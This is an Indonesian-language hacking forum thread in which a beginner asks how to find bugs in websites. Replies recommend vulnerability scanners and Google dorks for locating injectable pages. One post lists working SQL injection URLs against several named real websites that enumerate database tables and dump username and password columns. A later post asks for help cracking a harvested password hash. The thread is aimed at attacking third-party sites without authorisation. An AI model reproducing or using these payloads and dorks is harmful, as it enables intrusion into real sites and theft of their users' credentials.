Page 1 of 2

[ASK] Cara mencari bug situs

Posted: Wed Jan 27, 2010 4:09 am
by indroe
bang, :cry:
aku masih bingung nih, bagaimana sih caranya cari bug sebuah situs itu?
tolong dibantu ya.. :kaca:
masih newbie soale.. hhehehehe.. pengen banyak belajar...

thanks before

Re: [ASK] Cara mencari bug situs

Posted: Wed Jan 27, 2010 5:28 am
by poni
Pakai vulnurable scanner.di forum ini search dgn keyword. Nikto,acunetix,goolag scanner.ikuti thread2 di web hacking.

Re: [ASK] Cara mencari bug situs

Posted: Wed Jan 27, 2010 8:39 am
by 3xtr3m3b0y
indroe wrote:bang, :cry:
aku masih bingung nih, bagaimana sih caranya cari bug sebuah situs itu?
tolong dibantu ya.. :kaca:
masih newbie soale.. hhehehehe.. pengen banyak belajar...

thanks before
harus tau dulu jenis2 vulner yg ada pada web, stelah itu utk mencari target yg tepat bisa dgn cara yg diberikan oleh Om PONI...

Re: [ASK] Cara mencari bug situs

Posted: Sat Jan 30, 2010 7:00 am
by Muhammad_ibl
Ne ada beberapa bug SQL Injection..Mudah-mudahan dapat menjadi bahan referensi..

Code: Select all

http://www.santika.com/news.php?id=-37%20union%20select%201,2,3,group_concat%28table_name%29

%20from%20information_schema.tables%20where%20table_schema=database%28%29--

Code: Select all

http://www.santika.com/news.php?id=-37%20union%20select%201,2,3,group_concat%28column_name%2

9%20from%20information_schema.columns%20where%20table_name=0x6d656d62657273686970--

Code: Select all

http://www.skw.co.id/news.php?id=-91%20union%20select%201,group_concat%28table_name%29,3,4,5

%20from%20information_schema.tables%20where%20table_schema=database%28%29--

Code: Select all

http://www.milim.com/news.php?id=-100%20union%20select%201,group_concat%28bb_username,0x3a,b

b_password%29,3,4,5,6,7,8%20from%20bb_users--

Code: Select all

http://www.milim.com/news.php?id=-100%20union%20select%201,group_concat%28username,0x3a,pass

word%29,3,4,5,6,7,8%20from%20cms_users--

Re: [ASK] Cara mencari bug situs

Posted: Sat Jan 30, 2010 9:59 am
by indroe
oke,, makasih bwat smua

Re: [ASK] Cara mencari bug situs

Posted: Sat Jan 30, 2010 11:03 pm
by wiLMaR_kiDz
jgn lupa, manfaatin juga si mulut ember "Google".... :ngakak: :ngakak: :putusasa:

Re: [ASK] Cara mencari bug situs

Posted: Sun Jan 31, 2010 3:43 pm
by abit doang
ikuti cara om WIL_ yaitu coba2/cari google atau situs2 kayak milw0rm dll..
lewat google misal sqli ketik inurl:news.php?id=9 atau inurl:union+all+select atau inurl:phpmyadmin
atau yg lain na, tinggal explore om google, nyari mah banyak, paling nanti mentok

Re: [ASK] Cara mencari bug situs

Posted: Sun Jan 31, 2010 3:54 pm
by abit doang
maksud na klo mentok nanya lagi, paling susah na klo mentok d Hash. :D

Re: [ASK] Cara mencari bug situs

Posted: Fri Apr 09, 2010 7:25 pm
by Muhammad_ibl
ada yang bisa mecahin ne hash gak ??
susah bgd gan.. udah di ubek2 si paman, tapi gak juga ketemu ..
mohon bantuannya ya agan agan yang master..
:kaca: :kaca: :kaca: :maaf: :maaf:

Code: Select all

baa18c15ce584efeeae5a4f88802658c

Re: [ASK] Cara mencari bug situs

Posted: Fri Apr 09, 2010 8:26 pm
by cyber_criminal
tlong jlasin dong ttng fungsi 0x3a..... :cry: :cry: :cry:
ane slalu terhenti di tahap ini pas make sqli :circle: :circle: :circle:
mohon bantuannya ya...